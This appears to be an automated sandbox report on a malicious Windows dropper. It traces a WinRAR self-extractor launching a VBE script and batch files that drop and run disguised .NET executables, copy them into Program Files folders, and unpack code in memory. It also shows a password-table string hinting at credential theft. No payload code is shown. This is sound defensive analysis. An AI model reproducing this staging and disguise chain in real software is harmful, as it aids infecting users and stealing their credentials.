Source: D3UfLhBBJJ.12.dr, TndQPxMXQo.12.dr, r0qjgzPIkh.12.dr, x0yxQhURQn.12.dr, XeIbEvYWIQ.12.dr, iGtwZmweIi.12.dr, J6wWm83AcX.12.dr, WMVgrZzlI2.12.dr, A6qid9rKI0.12.dr, xpwmdiF9Xd.12.dr, mFwkz74ztw.12.dr, lDghQMNLEm.12.dr, sF5lPCsrSZ.12.dr, jfFWd9FPzs.12.dr, GjC3IcPkIm.12.dr, Vy9PixD8sc.12.dr, K3UVPTvz6l.12.dr, mS5gWY23qA.12.dr, mdDDzs62xj.12.dr, 3nX90DZTPW.12.dr, JwuABv9dm3.12.dr, xwt4fmTFUM.12.dr, 86j4JQ2o4Z.12.dr, 2g2rxNrFnw.12.dr, LIyiRunvqW.12.dr, zT3f06aISQ.12.dr, kwohGiMSf5.12.dr, zxyq1dsFGb.12.dr, 3G2wLqKb18.12.dr, XThNagBSlP.12.dr, ADrKBoDBrh.12.dr, Bg9Q2dJ3qB.12.dr, WxN1Z9Ezn6.12.dr, qjA8QD9Yvc.12.dr, Za0p8caj7c.12.dr, e727nJSxva.12.dr, VPD1eybCAW.12.dr, 3V4JMiLW3I.12.dr, qYT7wvvnKf.12.dr, NJjqqd0MbJ.12.dr, 0MQKc7KiGj.12.dr, KmyMndCGiO.12.dr, 1iRZHQm6nf.12.dr, Bcsa3YuZos.12.dr, 1OV5THlLD9.12.dr, Wg9yq9gc1h.12.dr, Qx1koE7tFM.12.dr, nXWAUw0iQ4.12.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9FwQYJSj4N.exe	Virustotal: Detection: 59%
Source: 9FwQYJSj4N.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

File read: C:\Users\user\Desktop\9FwQYJSj4N.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9FwQYJSj4N.exe "C:\Users\user\Desktop\9FwQYJSj4N.exe"
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\providerBrowserruntimeCrt\Providerbroker.exe "C:\providerBrowserruntimeCrt/Providerbroker.exe"
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\providerBrowserruntimeCrt\Providerbroker.exe "C:\providerBrowserruntimeCrt/Providerbroker.exe"	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\81eb946674e99f	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Directory created: C:\Program Files\Common Files\81eb946674e99f	Jump to behavior

Source: 9FwQYJSj4N.exe

Static file information: File size 10714393 > 1048576

Source: 9FwQYJSj4N.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9FwQYJSj4N.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9FwQYJSj4N.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9FwQYJSj4N.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9FwQYJSj4N.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9FwQYJSj4N.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 9FwQYJSj4N.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 9FwQYJSj4N.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9FwQYJSj4N.exe

Source: 9FwQYJSj4N.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9FwQYJSj4N.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9FwQYJSj4N.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9FwQYJSj4N.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9FwQYJSj4N.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

Unpacked PE file: 5.2.Providerbroker.exe.1260000.6.unpack

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

File created: C:\providerBrowserruntimeCrt\__tmp_rar_sfx_access_check_3876921

Jump to behavior

Source: 9FwQYJSj4N.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101F640 push ecx; ret	0_2_0101F653
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101EB78 push eax; ret	0_2_0101EB96
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF8490E7AAA pushad ; retf	5_2_00007FF8490E7AAB
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF8490E6C30 pushad ; ret	5_2_00007FF8490E6C31
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF8490E6C8B pushad ; ret	5_2_00007FF8490E6C90
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Code function: 5_2_00007FF8490E60B0 push edi; retf	5_2_00007FF8490E60B6
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF84900C29C push esp; retn 0000h	12_2_00007FF84900C29D
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF84900C114 push edx; retn 0000h	12_2_00007FF84900C299
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF84900CFE4 pushfd ; iretd	12_2_00007FF84900CFE5
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF849177AAA pushad ; retf	12_2_00007FF849177AAB
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF849176C30 pushad ; ret	12_2_00007FF849176C31
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF8491760B0 push edi; retf	12_2_00007FF8491760B6
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF849176C8A pushad ; ret	12_2_00007FF849176C90
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Code function: 12_2_00007FF84986794D push ebx; retf	12_2_00007FF84986796A

